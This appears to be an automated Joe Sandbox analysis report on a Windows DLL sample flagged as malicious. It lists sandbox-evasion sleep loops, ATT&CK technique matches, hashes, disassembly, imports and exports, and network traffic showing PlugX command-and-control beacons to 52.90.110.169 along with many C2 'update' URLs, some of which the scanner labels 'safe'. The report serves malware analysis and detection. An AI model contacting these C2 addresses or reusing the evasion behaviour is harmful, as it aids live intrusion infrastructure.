Source: C:\Windows\SysWOW64\rundll32.exe TID: 7048 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3608 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2156 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3784 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3088 | Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1172 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1816 | Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6468 | Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3632 | Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2244 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6620 | Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2132 | Thread sleep count: 2710 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2132 | Thread sleep time: -271000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2132 | Thread sleep count: 7167 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2132 | Thread sleep time: -716700s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1864 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4816 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 368 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6128 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2820 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2404 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3940 | Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6464 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5684 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5280 | Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6460 | Thread sleep count: 99 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: rundll32.exe, 0000001E.00000003.3942529688.000000000336C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.000000000336C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD528E0 CreateMailslotW,LoadLibraryA,GetProcAddress

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.90.110.169 80
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: ec2-52-90-110-169.compute-1.amazonaws.com
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD56B50 LogonUserW
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD72B70 bind
MITRE ATT&CK Matrix (techniques prefixed with a number were matched by signatures, the number being the count shown in the report; unnumbered techniques are the matrix's default entries and were not matched)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Service Execution; 2 Native API; At; Cron; Launchd; Scheduled Task
Persistence: 1 Valid Accounts; 3 Windows Service; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Valid Accounts; 11 Access Token Manipulation; 3 Windows Service; 111 Process Injection; 1 DLL Side-Loading; RC Scripts
Defense Evasion: 1 Valid Accounts; 1 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 111 Process Injection; 1 Rundll32; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 111 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Peripheral Device Discovery; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 21 Encrypted Channel; 1 Non-Standard Port; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
No Antivirus matches
Source | Detection | Scanner | Label
http://52.90.110.169/update?id=7e9d30a3s | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=01b63ea5fa | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=01b63ea5 | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=71f3cbf75 | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=dc53bbb9date?id=36ebb732Q | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=36ebb732 | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=592b1d5c | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=dc53bbb9r | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=7e9d30a3H | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=592b1d5c5 | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=01b63ea5date?id=d791f282 | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=7e9d30a3Q | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=7e9d30a3 | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=71f3cbf7date?id=36ebb732 | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=71f3cbf7 | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=dc53bbb9 | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=d791f282 | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=6171a2b6 | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=36ebb732R | 0% | Avira URL Cloud | safe
http://52.90.110.169:8080/update?id=dc53bbb9aa | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=36ebb732Q | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=8a8b3aa5 | 0% | Avira URL Cloud | safe
http://52.90.110.169/update?id=8a8b3aa5i | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ec2-52-90-110-169.compute-1.amazonaws.com | 52.90.110.169 | true | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
40.113.110.67 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
40.115.3.253 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.165.165.26 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.90.110.169 | ec2-52-90-110-169.compute-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | true
162.159.36.2 | unknown | United States | 13335 | CLOUDFLARENETUS | false
2.19.97.171 | unknown | European Union | 20940 | AKAMAI-ASN1EU | false
Private IPs: 192.168.2.1, 192.168.2.7, 192.168.2.4, 192.168.2.6
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1482059
    Start date and time:2024-07-25 17:53:23 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 7m 19s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name:Run with higher sleep bypass
Number of new started processes analysed:42
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:LisectAVT_2403002B_14.dll
    Detection:MAL
    Classification:mal56.evad.winDLL@93/0@1/11
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 97%
    • Number of executed functions: 41
    • Number of non-executed functions: 13
    Cookbook Comments:
    • Found application associated with file extension: .dll
    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded IPs from analysis (whitelisted): 192.229.221.95, 2.19.126.137
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • VT rate limit hit for: LisectAVT_2403002B_14.dll
Time | Type | Description
11:55:21 | API Interceptor | 1105313x Sleep call for process: rundll32.exe modified
                            No context
                            No created / dropped files found
                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.588882386142034
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:LisectAVT_2403002B_14.dll
                            File size:190'976 bytes
                            MD5:2769761a23f793d93bbad3ded28e8ebd
                            SHA1:df83ef58856650a7564b0f5d0914dc8478511ccf
                            SHA256:0f0a7d189ef514f97279ef24194c08ea5c99dd39a9d7af486ea8aedb68e0f18b
                            SHA512:9af46e2c44a63dc4a07cc7d75fb24d82174801e87b0cf95f3ca8b86613ba20de93c0cc246d20a7487f05ce5825c1a6824e8ef31dc2a3b196b079527186fde047
                            SSDEEP:3072:M2U6Z3AUyPihSJjBIYj5MxPYlGUySgWmVNlFJa34kg:M2JVwihSJjOYWPkOXXB
                            TLSH:9E144A14E5018339F8BF00FAC7BD273D696C9A72879926C323C55C5A66867E3BE35183
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X..............A...............y.......I.......H.......O.....Rich............PE..L......N...........!.....d...6.............
                            Icon Hash:7ae282899bbab082
                            Entrypoint:0x737d1880
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x737d0000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x4EE21DCE [Fri Dec 9 14:40:14 2011 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:a87240b873c1a5b2b17c559a4ce533e7
                            Instruction
                            push ebp
                            mov ebp, esp
                            push ecx
                            mov eax, dword ptr [73800628h]
                            and eax, 01h
                            jne 00007F97047E9BADh
                            mov ecx, dword ptr [73800628h]
                            or ecx, 01h
                            mov dword ptr [73800628h], ecx
                            mov edx, dword ptr [737F8194h]
                            mov dword ptr [73800624h], edx
                            mov eax, dword ptr [ebp+0Ch]
                            mov dword ptr [ebp-04h], eax
                            cmp dword ptr [ebp-04h], 00000000h
                            je 00007F97047E9BA1h
                            cmp dword ptr [ebp-04h], 01h
                            je 00007F97047E9B94h
                            jmp 00007F97047E9B9Eh
                            call 00007F97047E9363h
                            jmp 00007F97047E9B97h
                            call 00007F97047E938Ch
                            mov eax, 00000001h
                            mov esp, ebp
                            pop ebp
                            retn 000Ch
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            sub esp, 08h
                            mov eax, dword ptr [737F8120h]
                            mov dword ptr [ebp-04h], eax
                            mov dword ptr [ebp-08h], 00000000h
                            call 00007F97047E932Bh
                            call 00007F97047FF966h
                            mov dword ptr [ebp-08h], eax
                            mov ecx, dword ptr [ebp-08h]
                            push ecx
                            call 00007F97047EA43Ah
                            push eax
                            call 00007F97047EA4F4h
                            test eax, eax
                            jne 00007F97047E9B9Bh
                            mov edx, dword ptr [ebp-08h]
                            push edx
                            call 00007F97047EA607h
                            call 00007F97047E9332h
                            mov eax, dword ptr [ebp-08h]
                            mov esp, ebp
                            pop ebp
                            ret
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            pop ebp
                            ret
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            pop ebp
                            ret
                            int3
                            int3
                            Programming Language:
                            • [IMP] VS2008 SP1 build 30729
                            • [C++] VS2010 build 30319
                            • [EXP] VS2010 build 30319
                            • [RES] VS2010 build 30319
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x2bfc0 | 0x3d4 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2b590 | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9a000 | 0x3e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9b000 | 0x2188 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x28000 | 0x1b4 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x262de | 0x26400 | a12ac472b50da1763b63988f2d9724c4 | False | 0.4705371732026144 | data | 6.374301962893391 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x28000 | 0x4394 | 0x4400 | 82b918d77a044f40686ae5809c89ddbd | False | 0.759765625 | data | 7.055205472510572 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2d000 | 0x6c551 | 0xa00 | c81870d3c545b9989522cccbbdbde726 | False | 0.913671875 | data | 7.449705734565964 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x9a000 | 0x3e0 | 0x400 | 6117fb448b882a3030c2aff8efcd289b | False | 0.4248046875 | data | 3.0643979755835313 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x9b000 | 0x26fc | 0x2800 | 745f439c351f3878b92a5df493588d95 | False | 0.62431640625 | data | 6.137144019251764 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_DIALOG | 0x9a340 | 0x9c | data | Chinese | China | 0.6794871794871795
RT_VERSION | 0x9a0a0 | 0x29c | data | Chinese | China | 0.4550898203592814
DLL | Import
KERNEL32.dll | EnumTimeFormatsW, GlobalAddAtomW, TryEnterCriticalSection, HeapAlloc, EnumResourceNamesW, GlobalFix, HeapCompact, TlsSetValue, FindResourceExA, MoveFileA, CompareFileTime, WriteProfileSectionW, InitializeSListHead, UpdateResourceA, ClearCommBreak, GetDevicePowerState, Sleep, EnumResourceTypesW, SetConsoleTitleA, IsSystemResumeAutomatic, GetShortPathNameA, GetPrivateProfileStringW, IsBadStringPtrA, CreateMailslotW, LoadLibraryA, GetProcAddress, PeekConsoleInputA, GetSystemWindowsDirectoryW, OpenWaitableTimerA, CreateFileW, GetLastError, SetFilePointer, WriteFile, CloseHandle, SetConsoleActiveScreenBuffer, SetCurrentDirectoryW, EnumSystemCodePagesA, GetCalendarInfoA, GetTickCount, FindResourceW
USER32.dll | DefDlgProcA, DrawAnimatedRects, ArrangeIconicWindows, SetWindowRgn, HideCaret, ScrollWindowEx, ShowWindowAsync, RegisterClipboardFormatA, AnimateWindow, FillRect, GetClassInfoExW, IsDialogMessageW, CharLowerBuffA, LoadStringW, GetKBCodePage, DlgDirSelectComboBoxExA, ClipCursor, IsWindowUnicode, SendMessageTimeoutA, PostMessageA, OemToCharA, GetClipboardFormatNameA, UnregisterDeviceNotification, ExitWindowsEx, SetPropA, SystemParametersInfoA, UnregisterClassA, GetDlgItemInt, IsWindowEnabled, LoadCursorFromFileA
GDI32.dll | CloseFigure, SetBitmapBits, GetPixel, PlayMetaFileRecord, GetMiterLimit, GetEnhMetaFileHeader, SetICMProfileA, SetColorSpace, SetICMMode, SetTextColor, SetDeviceGammaRamp, SelectPalette, GetWindowExtEx, CreateEnhMetaFileA, DeleteDC, LPtoDP, GetBitmapBits
ADVAPI32.dll | IsValidSid, SetSecurityDescriptorSacl, RegDisablePredefinedCache, FileEncryptionStatusW, LookupPrivilegeNameW, OpenBackupEventLogW, LogonUserW, RegEnumKeyW, StartServiceCtrlDispatcherW, InitiateSystemShutdownExW, SetKernelObjectSecurity, AreAllAccessesGranted, QueryServiceConfigA, LookupPrivilegeNameA, RegOpenUserClassesRoot, ImpersonateLoggedOnUser, ReadEventLogW, RegEnumKeyExA
Name | Ordinal | Address
GnrkBltvkx | 1 | 0x737d1a90
GnrkBmoaar | 2 | 0x737d1aa0
GnrkCyrpw | 3 | 0x737d1a40
GnrkEkp | 4 | 0x737d1be0
GnrkEnjzs | 5 | 0x737d1d80
GnrkFa | 6 | 0x737d1d60
GnrkFsx | 7 | 0x737d1940
GnrkGm | 8 | 0x737d1c70
GnrkGt | 9 | 0x737d1b30
GnrkHhcpo | 10 | 0x737d1c20
GnrkHjtl | 11 | 0x737d1c10
GnrkIiip | 12 | 0x737d1d90
GnrkJird | 13 | 0x737d1d50
GnrkJstv | 14 | 0x737d1e20
GnrkKhlhca | 15 | 0x737d1e10
GnrkKhqbbu | 16 | 0x737d1f00
GnrkLmkamk | 17 | 0x737d1dc0
GnrkLoc | 18 | 0x737d1a10
GnrkNlqh | 19 | 0x737d1e00
GnrkNofovl | 20 | 0x737d1da0
GnrkNr | 21 | 0x737d1970
GnrkNsdwzc | 22 | 0x737d1a70
GnrkOda | 23 | 0x737d1ca0
GnrkOhqbhe | 24 | 0x737d1ee0
GnrkOi | 25 | 0x737d1db0
GnrkOksgc | 26 | 0x737d1cb0
GnrkOxft | 27 | 0x737d1960
GnrkPp | 28 | 0x737d1b00
GnrkQm | 29 | 0x737d1bf0
GnrkQr | 30 | 0x737d1770
GnrkQulon | 31 | 0x737d1c90
GnrkRrdcfn | 32 | 0x737d1c50
GnrkSbq | 33 | 0x737d1990
GnrkSf | 34 | 0x737d1ec0
GnrkStso | 35 | 0x737d1ae0
GnrkTcfv | 36 | 0x737d1eb0
GnrkTch | 37 | 0x737d1c30
GnrkTjxdo | 38 | 0x737d1ab0
GnrkTrg | 39 | 0x737d1e60
GnrkUsmc | 40 | 0x737d1930
GnrkVnndq | 41 | 0x737d1b10
GnrkWapq | 42 | 0x737d1de0
GnrkWsnq | 43 | 0x737d1ad0
GnrkWtlrh | 44 | 0x737d1c00
GnrkWyey | 45 | 0x737d1c40
GnrkXalbb | 46 | 0x737d1950
GnrkXzwnp | 47 | 0x737d1a50
GnrkZewk | 48 | 0x737d1d20
GnrkZtdij | 49 | 0x737d1b70
Language of compilation system | Country where language is spoken | Map
Chinese | China |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-25T17:57:11.023216+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49733 | 80 | 192.168.2.6 | 52.90.110.169
2024-07-25T17:55:50.513790+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49723 | 80 | 192.168.2.6 | 52.90.110.169
2024-07-25T17:56:37.112001+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49729 | 8080 | 192.168.2.6 | 52.90.110.169
2024-07-25T17:55:09.573145+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49720 | 52.165.165.26 | 192.168.2.6
2024-07-25T17:55:33.455482+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49721 | 80 | 192.168.2.6 | 52.90.110.169
2024-07-25T17:57:16.369027+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49734 | 80 | 192.168.2.6 | 52.90.110.169
2024-07-25T17:56:23.050140+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49726 | 8080 | 192.168.2.6 | 52.90.110.169
2024-07-25T17:55:11.045496+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49718 | 80 | 192.168.2.6 | 52.90.110.169
2024-07-25T17:54:31.588390+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49713 | 52.165.165.26 | 192.168.2.6
2024-07-25T17:57:05.987539+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49732 | 80 | 192.168.2.6 | 52.90.110.169
2024-07-25T17:56:32.080676+0200 | TCP | 2036858 | ET MALWARE PlugX CnC Beacon | 49728 | 8080 | 192.168.2.6 | 52.90.110.169
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 25, 2024 17:54:10.689420938 CEST | 49674 | 443 | 192.168.2.6 | 173.222.162.64
Jul 25, 2024 17:54:10.689469099 CEST | 49673 | 443 | 192.168.2.6 | 173.222.162.64
Jul 25, 2024 17:54:11.017412901 CEST | 49672 | 443 | 192.168.2.6 | 173.222.162.64
Jul 25, 2024 17:54:17.826790094 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:17.826845884 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:17.826919079 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:17.827599049 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:17.827613115 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.752722979 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.752827883 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:18.758467913 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:18.758491993 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.758790970 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.760627031 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:18.760688066 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:18.760699034 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.760873079 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:18.808512926 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.942621946 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.943001986 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.943121910 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:18.943309069 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:18.943332911 CEST | 443 | 49710 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:18.943351030 CEST | 49710 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:20.298732996 CEST | 49674 | 443 | 192.168.2.6 | 173.222.162.64
Jul 25, 2024 17:54:20.298733950 CEST | 49673 | 443 | 192.168.2.6 | 173.222.162.64
Jul 25, 2024 17:54:20.626837015 CEST | 49672 | 443 | 192.168.2.6 | 173.222.162.64
Jul 25, 2024 17:54:22.400389910 CEST | 443 | 49705 | 173.222.162.64 | 192.168.2.6
Jul 25, 2024 17:54:22.400582075 CEST | 49705 | 443 | 192.168.2.6 | 173.222.162.64
Jul 25, 2024 17:54:26.147855997 CEST | 49711 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:54:26.153084993 CEST | 80 | 49711 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:54:26.153155088 CEST | 49711 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:54:26.153551102 CEST | 49711 | 80 | 192.168.2.6 | 52.90.110.169
Jul 25, 2024 17:54:26.163907051 CEST | 80 | 49711 | 52.90.110.169 | 192.168.2.6
Jul 25, 2024 17:54:26.166481018 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:26.166532993 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:26.166754007 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:26.167644024 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:26.167656898 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.028791904 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.029649019 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:27.030607939 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:27.030620098 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.030847073 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.032768965 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:27.032922983 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:27.032922983 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:27.032927990 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.076498032 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.212403059 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.212488890 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.212953091 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:27.212953091 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:27.212982893 CEST | 443 | 49712 | 40.113.110.67 | 192.168.2.6
Jul 25, 2024 17:54:27.213006020 CEST | 49712 | 443 | 192.168.2.6 | 40.113.110.67
Jul 25, 2024 17:54:30.532378912 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:30.532429934 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:30.532510996 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:30.533443928 CEST | 49713 | 443 | 192.168.2.6 | 52.165.165.26
Jul 25, 2024 17:54:30.533454895 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
Jul 25, 2024 17:54:31.313271046 CEST | 443 | 49713 | 52.165.165.26 | 192.168.2.6
